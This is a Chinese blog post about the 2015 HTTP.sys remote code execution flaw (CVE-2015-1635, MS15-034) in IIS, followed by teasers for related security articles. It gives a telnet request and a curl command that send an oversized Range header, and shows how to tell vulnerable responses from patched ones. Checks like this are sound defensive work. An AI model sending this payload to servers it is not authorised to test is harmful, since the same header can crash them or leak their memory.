HTTP.SYS远程代码执行漏洞测试

摘要:
简介:在2015年4月的安全补丁日,微软发布了大量安全更新,以修复HTTP中的漏洞。sys,允许远程代码执行。编号为CVE-2015-1635(MS15-034)。通过利用HTTP。sys安全漏洞,攻击者可以通过发送恶意http请求包远程读取IIS服务器的内存数据或破坏服务器系统的蓝屏。根据公告,该漏洞对服务器系统有重大影响,主要影响Windows 7和Windo

简介:

    在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

测试:

方法1:

# telnet www.test.com 80
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615

方法2:

# curl -v www.test.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

判断是否存在漏洞:

不存在该漏洞的响应包为:

HTTP Error 400. The request has an invalid header name.

存在漏洞的响应包为:

< HTTP/1.1 416 Requested Range Not Satisfiable
< Content-Type: text/html
< Last-Modified: Thu, 22 Aug 2013 23:53:12 GMT
< Accept-Ranges: bytes
< ETag: "2edebc2929fce1:0"

参考链接:http://www.tiaozhanziwo.com/archives/765.html

免责声明:文章转载自《HTTP.SYS远程代码执行漏洞测试》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇点击劫持(click jacking)参加了两天QCon会议,你有什么感觉?下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

【漏洞分析】dedecms有前提前台任意用户密码修改

 0x00 前言 早上浏览sec-news,发现锦行信息安全发布了一篇文章《【漏洞分析】 织梦前台任意用户密码修改》,看完之后就想着自己复现一下。 该漏洞的精髓是php的弱类型比较,'0.0' == '0',也有一定的限制,只对没有设置安全问题的用户有效(默认是没有设置的)。 0x01 漏洞版本 我复现的是DedeCMS V5.7 SP2正式版,2018-...

Flask(Jinja2) 服务端模板注入漏洞vulhub

Flask(Jinja2) 服务端模板注入漏洞vulhub 前言 Flask简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。 Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 web 应用程序可以是一些 web 页面、博客、w...

用友GRP-u8 注入-RCE漏洞复现

​ ​用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一、漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。 二、漏洞复现 SQL注入POC POST /Proxy HTTP/1.1Host:localhost:8080Upgrade-...

ThinkPHP漏洞分析与利用

一、组件介绍 1.1 基本信息 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要P...

【转】关于WannaCry勒索蠕虫的安全预警

【转载】如有侵权或者风险,请及时联系我,我会删除。 自5月12日起一款名为WannaCry的蠕虫勒索软件袭击全球网络,这被认为是迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织。目前国内多家企事业单位相继被攻陷,其中包括中石油加油站、浙江传媒大学、中国计量学院、贺州学院、桂林电子科技大学、桂林航天工业学院、大连海事大学、山东大学等。 一、...

Java 安全之:csrf攻击总结

最近在维护一些老项目,调试时发现请求屡屡被拒绝,仔细看了一下项目的源码,发现有csrf token校验,借这个机会把csrf攻击学习了一下,总结成文。本文主要总结什么是csrf攻击以及有哪些方法来防范,接下来会再写一篇文章,从源码中来学习一下实战中是如何防御csrf攻击的。 主要内容如下: 什么是CSRF攻击 几种常见的攻击类型 CSRF的特点 防护策略...